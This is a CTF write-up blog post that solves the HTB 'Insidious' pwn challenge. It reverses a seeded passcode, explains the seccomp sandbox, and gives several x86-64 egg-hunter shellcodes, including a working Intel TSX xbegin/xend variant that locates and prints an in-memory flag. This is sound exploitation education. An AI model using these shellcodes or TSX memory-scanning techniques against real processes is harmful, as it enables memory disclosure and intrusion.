Abusing Intel TSX Instructions for Fun and CTF Flag

danilonc included in CTF Write-ups Binary Exploitation

2024-06-21 About 4700 words 22 minutes

Contents

Using intel TSX/Instructions to create an egg hunter shellcode and solve a CTF challenge.

Intro

My friends and I at Microsoft participated in the HTB Business CTF 2024. The event was fun, and we managed to solve 58 out of 63 challenges, which granted us the 15th place among 943 teams.

I personally dedicated most of my time to the following challenges:

Challenge	Category	# Teams that Solved
Insidious	Pwn (Binary Exploitation)	7
SOS or SSO?	Web	23
Living with Elegance	Crypto	127
Chrono Mind	Misc	143
Don’t Panic	Reverse Engineering	165

Additionally, I contributed to the following challenges:

Challenge	Category	# Teams that Solved
Blueprint Heist	Web	63
HTB Proxy	Web	71
Swarm	FullPwn	311
Tangled Heist	Forensics	319
Submerged	FullPwn	657

While HTB offers official write-ups, I wanted to share my own experience with the Insidious challenge. With only 7 teams managing to solve it, Insidious was the third least solved challenge. I discovered an unintended solution not covered in the official write-up, and I’m excited to share it with you.

TL;DR

The Insidious (pwn) challenge allowed the execution of shellcode in a highly restricted seccomp¹ sandbox. The sandbox blocked all system calls except for the write syscall, which could only access a specific memory address containing the flag. The challenge authors expected participants to solve the challenge using a Prefetch Side-Channel attack². However, I solved it by implementing an Egg Hunting shellcode that utilized the xbegin³/xend⁴ instructions, which are part of the TSX extensions⁵. This was necessary to discover mapped pages without using any syscall.

The shellcode that retrieved the flag was based on the SGXROP paper ⁶ and proof of concept ⁷:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


mov rsi, 0 /* Starting Address */
mov ecx, 0x7b425448 /* HTB{ needle */
1:
add rsi, 0x1000 /* Increment address by page size */
xbegin 1b       /* Initiate RTM transaction */
cmp ecx, [rsi]  /* Access Memory, IT WONT SIGSEGV because of xbegin/xend wrapper */
xend            /* end transaction */
jne 1b  /* JMP to 1: if transaction failed */

/* rsi contains the flag, Write flag to stdout */
mov rdx, 0x32 /* flag len - 50 Bytes */
mov rdi, 0x1  /* STDOUT  */
mov rax, 0x1  /* SYS_WRITE syscall number */
syscall

Snippet from Practical Enclave Malware with Intel SGX paper ⁶:

Egg Hunting. We also evaluated TAP as a novel method for egg hunting in regular (non-enclave) attacks, i.e., scanning the address space for injected shellcode. State-of-the-art egg hunters for Linux rely on syscalls (e.g., access) which report whether one of the parameters is a valid address. However, issuing a syscall requires the syscall instruction as well as setting up the required parameters. Thus, such egg hunters are usually larger than 30 bytes. Nemeth et al. argued that egg hunters with fault prevention cannot be smaller. However, our TAP egg hunter is only 16 bytes in size, i.e., the smallest egg hunter with fault prevention. With 360 cycles per address, it is also significantly faster (by a factor of 4.8) than egg hunters leveraging the access syscall (1730 cycles per address).

The remainder of this post will delve into the challenge details and my journey, including the failures, to ultimately arrive at the payload that secured the flag.

Prolog

As usual, HTB provided a Dockerfile with a fake flag for participants to run the challenge locally for testing purposes, once solved locally, the participants can execute the same attack against a remote server that contains the real flag.

➜  HTB24 sha256sum pwn_insidious.zip
0d5d46e3ea4bbb58a5ae3e5df181f5fcd7570c1d4c03b2d15ea9b19288cd28e3  pwn_insidious.z
ip
➜  HTB24 7z x pwn_insidious.zip 
...
➜  HTB24 tree
.
├── pwn_insidious
│   ├── build_docker.sh
│   ├── challenge
│   │   ├── flag.txt
│   │   └── insidious
│   └── Dockerfile
└── pwn_insidious.zip

3 directories, 5 files

The insidious is an ELF 64-bit binary, not stripped:

➜  challenge file pwn_insidious/challenge/insidious 
pwn_insidious/challenge/insidious: ELF 64-bit LSB pie executable, x86-64, version 
1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sh
a1]=ab678b13fe5804f5390bc74d9df006494e27c6cd, for GNU/Linux 3.2.0, not stripped

Connecting to the program, a [y/n] prompt is presented, answering y and a passcode is requested. Inputing a 00000000 passcode returns Wrong pass code:

Executing the binary - Y option

If we select n, we receive a shell running with the ctf user privileges. The flag is in the disk but is the access is restricted to root.

Executing the binary - N option

Reversing

During the competition, only the binary was available to competitors, necessitating the use of disassembler/decompiler tools to solve the challenge. My go to tool for CTFs is the Binary Ninja. Since this is a binary exploitation (pwn) challenge, I will also use the source-code⁸, released after the competition, to explain the challange in a more concise way.

Binary Ninja Decompilation

Pass code validation

After the y switch case statement, the main function calls the load_flag() (L116) and drop_privs() (L117) functions, reads the user passcode using scanf (L133), and compares the result with the return of the create_passcode() (L134).

103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138


int main(int argc, char** argv) {
    int passcode;
    void *shellcode;

    setup();
    banner();

    printf("Will you confront the spectral trials head-on, or retreat from the daunting path ahead? [y/n]");
    char c = getchar();

    switch (c){
        case 'y':
        case 'Y':
            load_flag();
            drop_privs();
            break;
        case 'n':
        case 'N':
            puts("Welcome to practice mode, where you can sharpen your abilities");
            puts("and master the art of navigating supernatural realms");
            drop_privs();
            shell();
            exit(EXIT_SUCCESS);
            break;
        default:
            puts("Wrong input");
            exit(EXIT_FAILURE);
    }

    printf("Can you share the crucial passcode that will unlock the mysterious realm's exit? ");
    scanf("%u%*c",&passcode);
    if (passcode != create_passcode()){
        puts("Wrong pass code");
        exit(EXIT_FAILURE);
    }
    ...

After discarding some of the values obtained using rand (L45) in a loop, create_passcode performs some arithmetic operations on random numbers obtained using rand().

44
45
46
47
48
49
50
51
52
53
54
55


unsigned int create_passcode(){
    for (int i=0 ; i<7 ; i++){rand();}
    unsigned int passcode = rand();
    for(unsigned int x=(unsigned int)rand() % 100;x>0;x--){
        passcode <<= 5;
        passcode ^=  15;
        passcode >>= 7;
        passcode ^=  500;
        passcode *=  27;
    }
    return passcode;
}

The PRNG is seeded in the setup function using the current time time(NULL) with a precision of seconds.

17
18
19
20
21
22


void setup() {
    setvbuf(stdin,  NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
    srand(time(NULL));
}

Two numbers generated in the same second time window will have the same password. By copying the Binary Ninja decompilation of create_passcode and doing some clean-up, we have a C program with equivalent functionality.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


// Cleaned-up copy and paste from Binary Ninja decompiler
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <time.h>

uint32_t create_passcode() {
  for (uint32_t i = 0; i <= 6; i = (i + 1))
  {
    rand();
  }
  uint32_t var_10 = rand();
  for (uint32_t i_1 = (rand() % 0x64); i_1 != 0; i_1 = (i_1 - 1))
  {
    uint32_t rax_11 = ((uint32_t)(((((var_10 << 5) ^ 0xf) >> 7) ^ 0x1f4) * 3));
           var_10 = (rax_11 + ((uint32_t)(rax_11 << 3)));
  }
  return ((uint32_t)var_10);
}

int main(){
  srand(time(NULL));
  uint32_t pass = create_passcode(); 
  printf("%u\n", pass);
}

Testing the Pass Code

The Real Challenge Starts

Now that we are able to generate the correct passcode, what exactly should I provide to the Can you share the detailed 80-step guide for a systematic path to the exit? prompt? Back to reversing!

On line 139, a new memory allocation with Read, Write, and Execute (RWX) permissions is created based on the shellcode_addr variable. Later, on line 143, 80 bytes (the shellcode size limit) are read and copied to this new location.

Some references to seccomp_load (L146), seccomp_release (L147), and memset (L150-152) are noticed but not relevant at that time.

If all the references to symbols containing shellcode weren’t clear, we identify that at the end of the main function, the 80 bytes received on L143 are executed as shellcode.

138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180


    // shellcode allocation
    shellcode = (void *)mmap((void*)(shellcode_addr<<12), 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANON | MAP_FIXED, -1, 0);
    assert (shellcode != (void *)-1);

    printf("Can you share the detailed 80-step guide for a systematic path to the exit? ");
    assert(read(STDIN_FILENO, shellcode, 80)>0);

    // seccomp load
    assert(seccomp_load(ctx)==0);
    seccomp_release(ctx);

    // remove everything related to the ctx on the heap
    for (int i = 0; i < 0x1000; i++){
        ((char *)ctx)[i] = 0;
    }

    // clear everything
    asm (
        "mov rbx, 0\n"
        "mov rcx, 0\n"
        "mov rdx, 0\n"
        "mov rdi, 0\n"
        "mov rsi, 0\n"
        "mov r8,  0\n"
        "mov r9,  0\n"
        "mov r10, 0\n"
        "mov r11, 0\n"
        "mov r12, 0\n"
        "mov r13, 0\n"
        "mov r14, 0\n"
        "mov r15, 0\n"
        "mov rbp, 0\n"
        "mov rsp, %0\n"
        "add rsp, 0x500\n"
        "wrfsbase rbx\n" // try to clear FS register
        "jmp rax\n"
        : "=r" (shellcode)          // Output operand
        : "r" (shellcode)           // Input operand (zero-initialized ebx)
        :                           // Clobbered registers
    );

    return 0;
}

Journey to the Flag (Failed Ideas)

Send a Shell Shellcode

Could we just get the flag by executing a reverse shell payload? Not so fast! As demonstrated in the Pass Code Validation section, the drop_privs function is executed after the flag is loaded into memory. Anything happening after that call is executed with ctf user (id 1000) privileges and not root user (id 0).

Also, we already have shell access by using the n in the first prompt prolog section.

Reading the Flag from Memory

So we are supposed to read the flag from memory, but where is the flag located in memory? We quickly realize a new insidious process is created for each connection using socat.

The binary has modern protections in place, such as ASLR. It’s time to understand load_flag and hopefully find a register or a fixed memory address pointing to the flag in memory.

Brute-forcing the Flag Location

Binary exploitation often involves a bit of luck. Let’s take a gamble!

An initial analysis of the load_flag function led us to believe the flag address entropy was only 4096 possibilities (12 bits / 3 nibbles). However, it is actually 16,777,216 possibilities (24 bits / 3 bytes).

The var_38 contains 3 random bytes from /dev/urandom, shifted left by 2 bytes (address 0x16ec). It is then mmaped with RW permissions (proto 3) at address 0x1712. The flag.txt is opened (address 0x1800) and read (address 0x184f).

load_flag binary ninja

We implemented a brute-force attack but quickly realized the mistake. The real CTF challenge server includes proof-of-work validation, slowing down such attacks. We stopped the attack and tried other ideas.

Find the Flag Pointer in Memory or Registers

In binary exploitation, a typical method to bypass Address Space Layout Randomization (ASLR)⁹ involves identifying a register that points to a specific target memory area, such as the main executable or a library. Alternatively, it may involve finding an offset from a pointer in a register. In our case, we don’t know what the 3 bytes read from /dev/urandom were, but if any register still points to the flag location or a memory location with a reliable offset to the flag, we can create shellcode to print the flag.

I tried to find such leaks using the gdb+gef¹⁰ debugger, but none were present.

It might not be clear from the decompilation output, but the challenge authors took care to remove references to the flag address from the stack and heap. This becomes evident after the challenge source code is released.

Cleaning flag address from stack (decompilation)

The allocation and address is set to NULL (0x18af, 0x18b7) in the stack.

alt text

Cleaning flag address from stack (source-code)

 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101


    // read the flag to the allocation
    fd = open("./flag.txt", 0);
    assert(fd>0);
    assert(read(fd, allocation, 50)>0);
    assert(close(fd)==0);

    // clear all references to the allocation
    // munmap(allocation, 0x1000); this also clear the flag inside the allocation, not viable
    allocation = NULL;
    address = NULL;

}

Cleaning flag address from heap (decompilation)

Cleaning heap memory for address which was used by seccomp call not covered yet. (0x1b43, 0x1b35)

removing heap references to the flag address

Clearning flag address from heap (source-code)

146
147
148
149
150
151
152
153
154
155


    // seccomp load
    assert(seccomp_load(ctx)==0);
    seccomp_release(ctx);

    // remove everything related to the ctx on the heap
    for (int i = 0; i < 0x1000; i++){
        ((char *)ctx)[i] = 0;
    }

    // clear everything

General-Purpose Registers

The authors also made sure to clean up the registers and pivot the stack before the shellcode execution (0x1b45..0x1bae).

Note:

The decompiler is very useful and makes the process of reverse engineering more convenient, but sometimes it misses some information. The decompiler output didn’t made any reference to instructions (0x1b45 .. 0x1bae) present in the disassembly view.

Using dogbolt.org decompiler and the same can be observed in angr 9.2.102, Ghidra 11.0.3 and IDA Pro (Hex-Rays) 8.4.0.240320

https://dogbolt.org/?id=cb38c00f-2fb3-4f69-8ef9-8170e5890220

decompiler view

disassembly view

Special or Extension Registers

Quoting Tavis Ormandy (taviso)¹¹ blog post about Zenbleed¹²:

All x86-64 CPUs have a set of 128-bit vector registers called the XMM registers. You can never have enough bits, so recent CPUs have extended the width of those registers up to 256-bit and even 512-bits.

The 256-bit extended registers are called YMM, and the 512-bit registers are ZMM.

These big registers are useful in lots of situations, not just number crunching! They’re even used by standard C library functions, like strcmp, memcpy, strlen and so on.

I only see the general-purpose registers getting cleaned. Maybe an (unintended?) solution is to get the address from any register, but we are unlucky again… I cannot see any register pointing to an interesting location after running info registers all in gdb.

gdb all registers

Getting the Memory from /proc/PID/maps

In Unix-like operating systems, the /proc filesystem is a special filesystem that presents information about processes and other system information. The /proc/PID/maps lists the virtual address space of a process and could potentially be used to locate the flag address in memory (likely one of the first or second mapped addresses).

Unfortunately for us, reading /proc/PID/maps is restricted to the root user (uid 0), even though the process has dropped its privilege to the ctf user (uid 1000).

Egg Hunting

With the introduction of ASLR, exploits could no longer reliably use fixed addresses in shellcode. In many exploitation scenarios, the attacker faces technical constraints such as limited payload size or restricted characters (e.g., null char, new lines, etc.).

In some instances, it is possible to implement a multi-stage shellcode, where a small first-stage shellcode stub scans the memory for a second-stage shellcode. The first 4 or 8 bytes of the second-stage payload are commonly referred to as the needle, and the entire memory is the haystack. This technique is called Egg Hunting.

A shellcode cannot directly scan the full virtual memory address space (linear memory) without risking a Segmentation fault (segfault)¹³.

Matt ‘Skape’ Miller¹⁴ described multiple Linux and Windows Egg Hunter techniques in his 2004 paper, Safely Searching Process Virtual Address Space¹⁵.

This challenge can be approached as an egg hunting problem. The flag starts with a known HTB{ prefix (needle), and once this location is found, we can use the write syscall to retrieve it.

Access syscall based egg hunting (failed)

One of the most common egg hunting implementations is the access syscall based egg hunting. ¹⁶ The access¹⁷ syscall has the signature int access(const char *pathname, int mode); and checks whether the calling process can access the file pathname. In summary, the basic idea is that the *pathname can have be a pointer to any memory address, the syscall is executed in kernel space, and if the memory is not mapped in the virtual address of the process, a EFAULT error is returned.

For our scenario, the following shellcode was executed.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28


mov rdi, 0x0 /* first page address */
jmp page_oracle_using_sys_access

next_page:
add rdi, 0x1000 /* increment rdi by page size */

page_oracle_using_sys_access:
xor rsi, rsi     /* int mode */
/* mov rdi, addr   const char filename */
mov rax, 0x15    /* sys_access systemcall - 21 */
syscall

cmp al, 0xf2 /* 0xf2 = EFAULT */
/* check EFLAGS, EFAULT = invalid page */
jz next_page

/* page is valid, compare with flag. flag is in the first bytes of page. */
mov ecx, 0x7b425448 /* HTB{ needle */
cmp ecx, [rdi]
jne next_page

mov rsi, rdi   /* egg location */
/* rdi points to flag, write to stdout */
mov rdi, 0x1   /* unsigned int fd - 0x1 - STDOUT */
/* mov rsi, 0x0   const char *buf - write source */
mov rdx, 0x32  /* size_t count */
mov rax, 0x1   /* sys_write systemcall */
syscall

Bad syscall

Program terminated with signal SIGSYS, Bad system call.

Why is this happening?!

Seccomp

Seccomp¹ (short for Secure Computing) is a Linux security feature that permits the creation of syscall filtering policies. A user-space process’s syscall invocation is checked by the seccomp policies before being served by the kernel. Only syscalls allowed by the filtering policy are permitted. For more implementation details, check the terenceli blog¹⁸.

Some of the previous sections of this blog post had references to Seccomp; it is now time to cover it.

insidious has references to four seccomp functions: seccomp_init, seccomp_load, seccomp_release, and seccomp_rule_add.

seccomp_init

seccomp_init is used to initialize the seccomp filter state, and it returns a scmp_filter_ctx. This function is invoked in the load_flag function, and the ctx pointer is saved to a global variable. The seccomp_init function takes one argument, def_action. The value 0 in our case is the constant SCMP_ACT_KILL, responsible for emitting the SIGSYS signal that killed our Access syscall-based egg hunting payload.

seccomp_init

seccomp_rule_add

seccomp_rule_add is used to define the filter rules. This function is also invoked in the load_flag function, but the Binary Ninja decompiler didn’t resolve the constant values.

seccomp_rule_add

Luckily (or most likely intentionally), the challenge authors left an assert statement that contained more information about the source code. Apparently, we can only use the WRITE syscall.

seccomp_rule_add_sys_write

seccomp_load and seccomp_release

seccomp_load is what, in fact, applies the seccomp policy in the current process. This is invoked after our shellcode is received by the main function (otherwise the read syscall receiving our shellcode would fail).

After being loaded in the kernel, the global ctx is no longer necessary and can be erased from memory (heap) with the seccomp_release function.

seccomp_load

Write syscall based egg hunting (failed)

Checking the write syscall manpage (man 2 write)¹⁹, we can see write syscall, similar to the access syscall, also return an EFAULT erro in case the buf is outside the process address space. We can use this behavior to implement a write-based egg hunter shellcode.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27


mov rsi, 0x0 /* first page address */
jmp page_oracle_using_sys_write

next_page:
add rsi, 0x1000 /* increment rsi by page size */

page_oracle_using_sys_write:
mov rdx, 0x8      /* count, using word size */
/* char *buf [rsi] */
mov rdi, 0x1      /* fd - stdout - 1 */
mov rax, 0x1    /* sys_write systemcall - 1 */
syscall

cmp al, 0xf2 /* 0xf2 = EFAULT */
/* check EFLAGS, EFAULT = invalid page */
jz next_page

/* page is valid, compare with flag. flag is in the first bytes of page. */
mov ecx, 0x7b425448 /* HTB{ needle */
cmp ecx, [rsi]
jne next_page

mov rdx, 0x32  /* size_t count */
/* char *buf [rsi] - flag location */
mov rdi, 0x1   /* unsigned int fd - 0x1 - STDOUT */
mov rax, 0x1   /* sys_write systemcall */
syscall

bad_write_syscall

SIGSYS with Bad system call again? But wasn’t write syscall allowed? What happened?

Really understanding the Seccomp filter

seccomp_rule_add

assert_faile message

The Binary Ninja decompilation didn’t provide all the information, but the assert message error had the full line of code:

1

seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 1,SCMP_A1_64(SCMP_CMP_EQ,(unsigned long)allocation))

seccomp_rule_add is a Variadic Function²⁰ and can perform some basic comparisons of the syscall arguments. Specifically for this challenge, we have:

1

SCMP_A1_64(SCMP_CMP_EQ,(unsigned long)allocation)

This means that the second syscall argument (rsi register in x86_64 calling convent), which is the const char *buf, must contain the flag address (allocation address).

We cannot use any syscall other than write with the right flag address.

Recap

At this point, we know that:

The challenge will execute our shellcode, which is limited to 80 bytes.
The flag is loaded in memory at a random location.
The flag starts with HTB{
No register or memory during the shellcode execution points to the flag.
The challenge implements a seccomp sandbox blocking all syscalls except write with the flag address.
The challenge requires reading the flag from the current process memory, as our shellcode is running in a seccomp sandbox with dropped privileges.
We need to discover the location without causing a SEGFAULT.

Research Time

With the syscall limitation, we cannot implement classic egg hunting based on syscalls. At this time, I started wondering if this challenge would require a time-based side-channel attack.

Another possibility would be to find an egg hunting method that would not crash the process.

Ideas

Ideas2

Prefetch Time-Based Attack (Intended Solution)

Modern computers use multiple layers of local fast caching memories, avoiding accessing the slow RAM memory (when compared to register and cache), resulting in improved execution performance ²¹.

Cache prefetching is a technique used by computer processors to boost execution performance by fetching instructions or data from their original storage in slower memory to faster local memory before it is actually needed ²². It can be hardware or software-based. For software implementations, the x86_64 CPU has the prefetch family of instructions.

In 2016, a paper was published demonstrating how a Prefetch Side-Channel Attack could be used to bypass Kernel ASLR ² ²³ ²⁴. The paper suggests measuring the time that a prefetch instruction takes to execute as an oracle, leaking information about whether the memory address is valid or not.

An implementation of this attack is present in a lab of the MIT Secure Hardware Design course ²⁵.

During the competition, I suggested this attack, but it would require some additional understanding of the attack and benchmarking memory access times. I didn’t discard this option but kept looking for alternatives.

A full write-up of this approach can be found in the official²⁶ challenge write-up.

TSX-Based Egg Hunting (Unintended Solution)

During the research, I also found the paper Practical Enclave Malware with Intel SGX paper⁶, that suggests, among other things, a better (or should I say faster and shorter) egg-hunting using Intel TSX intructions.

We also evaluated TAP as a novel method for egg hunting in regular (non-enclave) attacks, i.e., scanning the address space for injected shellcode. State-of-the-art egg hunters for Linux rely on syscalls (e.g., access) which report whether one of the parameters is a valid address. However, issuing a syscall requires the syscall instruction as well as setting up the required parameters. Thus, such egg hunters are usually larger than 30 bytes. Nemeth et al. argued that egg hunters with fault prevention cannot be smaller. However, our TAP egg hunter is only 16 bytes in size,1 i.e., the smallest egg hunter with fault prevention. With 360 cycles per address, it is also significantly faster (by a factor of 4.8) than egg hunters leveraging theaccess syscall (1730 cycles per address).

What is Intel TSX

Intel TSX (Transactional Synchronization Extensions) is an extension to the x86 instruction set architecture that provides hardware support for transactional memory. It allows developers to write code that can be executed atomically as a single transaction, ensuring consistency and isolation. Think of it as relational database transactions, but for CPU operations.

A clear proof-of-concept of using Intel TSX as an egg-hunting is available ⁷:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39


#include <stdio.h>
#include <memory.h>
#include <sys/mman.h>

#define INFO "\033[92m[INFO ]\033[39m "
#define ERROR "\033[91m[ERROR]\033[39m "

int main(int argc, char* argv[]) {
    // hide the egg
    int offset = 4096 * 1765 + 63;
    size_t egg = 0xdeadbeef;
    
    char* data = mmap(0, 1024 * 1024 * 16, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_POPULATE, -1, 0);
    memcpy(data + offset, &egg, sizeof(egg));
    printf(INFO "Hiding egg @ %p\n", data + offset);
    
    size_t start = (size_t)data - 1024 * 1024 * 8, address = 0;
    printf(INFO "Starting egg hunter @ 0x%zx (%zd MB before egg)\n", start, (size_t)(offset + data - start) / (1024 * 1024));

    // hunt the egg
    asm volatile(
        "1:\n"
        "inc %%rdi\n"
        "xbegin 1b\n"
        "cmpl %%edx, (%%rdi)\n"
        "xend\n"
        "jne 1b\n"
        : "=D"(address) /* found egg location */ : "D"(start) /* start searching */ , "d"(0xdeadbeef) /* egg */);

    // we (hopefully) found the egg
    printf(INFO "Found egg @ 0x%zx\n", address);
    if(address == (size_t)data + offset) {
        printf(INFO "Egg hunt was successful!\n");
    } else {
        printf(ERROR "Egg hunt failed\n");
    }

    return 0;
}

We now have everything needed to solve the challenge.

Or, well… almost.

One problem with the TSX-based shellcode is that it requires CPU support, which is limited to specific 6th-10th gen Intel consumer CPUs and v5-v6 Intel Xeon Server families.

Furthermore, due to Transactional Asynchronous Abort (TAA) - CVE-2019-11135²⁷ ²⁸ ²⁹ vulnerability, which is part of the Microarchitectural Data Sampling (MDS)³⁰, one mitigation ³¹ ³² ³³ is to disable disable TSX feature completely.

Getting the flag

Now, I had two paths forward:

A simpler one, leveraging TSX, requiring TSX (RTM) instruction support.
A more elaborate one, using a pre-fetch attack, requiring benchmarking CPU timing cases.

TSX is favorite

CPU Support

Using the low-privileged shell available with the option n, I checked the /proc/cpuinfo and, to my surprise, the challenge server had TSX (RTM) support enabled:

TSX Support Enabled

Execution

With that, I only needed to blindly send the TSX egg-hunting based shellcode.

Blindly, because I didn’t have access to any machine with TSX instructions available at home.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14


mov rsi, 0 /* Starting Address */
mov ecx, 0x7b425448 /* HTB{ needle */
1:
add rsi, 0x1000 /* Increment address by page size */
xbegin 1b       /* Initiate RTM transaction */
cmp ecx, [rsi]  /* Access Memory, IT WONT SIGSEGV because of xbegin/xend wrapper */
xend            /* end transaction */
jne 1b  /* JMP to 1: if transaction failed */

/* rsi contains the flag, Write flag to stdout */
mov rdx, 0x32 /* flag len - 50 Bytes */
mov rdi, 0x1  /* STDOUT  */
mov rax, 0x1  /* SYS_WRITE syscall number */
syscall

Flag

Fortunately, the shellcode executed correctly without the need for debugging, and I received the flag: Flag

Conclusion

This post turned out longer than anticipated, but it provides a detailed walkthrough of the challenge. It demonstrates the use of Linux egg-hunting shellcodes, leverages TSX for exploits, introduces the concept of a seccomp sandbox, and illustrates how theoretical concepts like egg hunting and side-channel attacks can be applied in real-world scenarios to solve security challenges.

Because of this challenge, I also started reviewing past research on microarchitectural attacks, side-channel techniques, trusted computing, and confidential computing. Hopefully, I can expand on this subject in future blog posts.

If you are interested in microarchitecture exploitation, check out the excellent Microarchitecture Exploitation playlist³⁴ from https://pwn.college/³⁵ at Arizona State University and the references below.